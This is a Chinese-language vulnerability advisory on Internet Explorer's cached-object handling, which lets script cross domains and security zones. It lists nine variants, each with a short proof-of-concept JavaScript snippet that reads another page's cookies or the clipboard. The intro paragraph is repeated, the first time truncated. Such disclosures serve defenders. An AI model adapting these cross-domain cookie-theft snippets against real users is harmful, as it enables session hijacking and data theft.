Microsoft Internet Explorer是微软开发和维护的WEB浏览器。 Internet Explorer在处理缓存对象(cached objects)时存在问题,远程攻击者可以利用这个漏洞执行其他域和安全区域中的脚本代码,造成信息泄露等问题。 当窗口之间通信的时候,MSIE安全机制必须确保页面在同一安全区域和同一域中,而缓存对象处理中MSIE安全机制对访问控制检查不充分。当攻击者在自己站点页面中打开窗口时IE会缓存主窗口到子窗口的引用(类似C的指针),虽然这时候子窗口内访问的URL可能已经改变了,但主窗口通过调用引用还是能够被控制,这样就可能使的直接访问不同域和不同安全区域中的内容。攻击者可以通过构建恶意WEB页面,并诱使用户点击,窃取目标用户COOKIE信息,泄露目标用户本地系统文件。 下面9个漏洞都是相关于对象缓存问题,但是每个漏洞都是独立的漏洞,使用独立的方法进行利用。下面所描述的包含3个部分,\"Cache\"显示怎样缓存有问题的对象,\"Exploit\"显示漏洞怎样工作,\"Impact\"描述漏洞的危害。 \"Full access\"表示可以访问任意域和任意安全区域中的任意页面文档对象模型(DOM)。 1. showModalDialog Cache: var fVuln=oWin.showModalDialog; Exploit - IE 5.5: fVuln(\"javascript:alert(dialogArguments.document.cookie)\",oWin,\"\"); Exploit - IE 6: 利用难度比较大,可使用\"analyze.dlg\" vulnerability. Impact: 在IE5.5中完全访问, IE6中\"My Computer\"安全区域可访问。 2. external Cache: var oVuln=oWin.external; Exploit: oVuln.NavigateAndFind(\"javascript:alert(document.cookie)\",\"\",\"\"); Impact: Full access. 3. createRange Cache: var fVuln=oWin.document.selection.createRange;...
Microsoft Internet Explorer是微软开发和维护的WEB浏览器。 Internet Explorer在处理缓存对象(cached objects)时存在问题,远程攻击者可以利用这个漏洞执行其他域和安全区域中的脚本代码,造成信息泄露等问题。 当窗口之间通信的时候,MSIE安全机制必须确保页面在同一安全区域和同一域中,而缓存对象处理中MSIE安全机制对访问控制检查不充分。当攻击者在自己站点页面中打开窗口时IE会缓存主窗口到子窗口的引用(类似C的指针),虽然这时候子窗口内访问的URL可能已经改变了,但主窗口通过调用引用还是能够被控制,这样就可能使的直接访问不同域和不同安全区域中的内容。攻击者可以通过构建恶意WEB页面,并诱使用户点击,窃取目标用户COOKIE信息,泄露目标用户本地系统文件。 下面9个漏洞都是相关于对象缓存问题,但是每个漏洞都是独立的漏洞,使用独立的方法进行利用。下面所描述的包含3个部分,\"Cache\"显示怎样缓存有问题的对象,\"Exploit\"显示漏洞怎样工作,\"Impact\"描述漏洞的危害。 \"Full access\"表示可以访问任意域和任意安全区域中的任意页面文档对象模型(DOM)。 1. showModalDialog Cache: var fVuln=oWin.showModalDialog; Exploit - IE 5.5: fVuln(\"javascript:alert(dialogArguments.document.cookie)\",oWin,\"\"); Exploit - IE 6: 利用难度比较大,可使用\"analyze.dlg\" vulnerability. Impact: 在IE5.5中完全访问, IE6中\"My Computer\"安全区域可访问。 2. external Cache: var oVuln=oWin.external; Exploit: oVuln.NavigateAndFind(\"javascript:alert(document.cookie)\",\"\",\"\"); Impact: Full access. 3. createRange Cache: var fVuln=oWin.document.selection.createRange; Exploit: fVuln().pasteHTML(\"<img src=\\"javascript:alert(document.cookie)\\">\"); Impact: Full access. 4. elementFromPoint Cache: var fVuln=oWin.document.elementFromPoint; Exploit: alert(fVuln(1,1).document.cookie); Impact: Full access. 5. getElementById Cache: var fVuln=oWin.document.getElementById; Exploit: alert(fVuln(\"ElementIdInNewDoc\").document.cookie); Impact: Full access. 6. getElementsByName Cache: var fVuln=oWin.document.getElementsByName; Exploit: alert(fVuln(\"ElementNameInNewDoc\")[0].document.cookie); Impact: Full access. 7. getElementsByTagName Cache: var fVuln=oWin.document.getElementsByTagName; Exploit: alert(fVuln(\"BODY\")[0].document.cookie); Impact: Full access. 8. execCommand Cache: var fVuln=oWin.document.execCommand; Exploit: fVuln(\"SelectAll\"); fVuln(\"Copy\"); alert(clipboardData.getData(\"text\")); Impact: 读区访问装载的文档 9. clipboardData Cache: var oVuln=oWin.clipboardData; Exploit: alert(oVuln.getData(\"text\")); or oVuln.setData(\"text\",\"data\"); Impact: 无需考虑设置,读/写访问剪贴板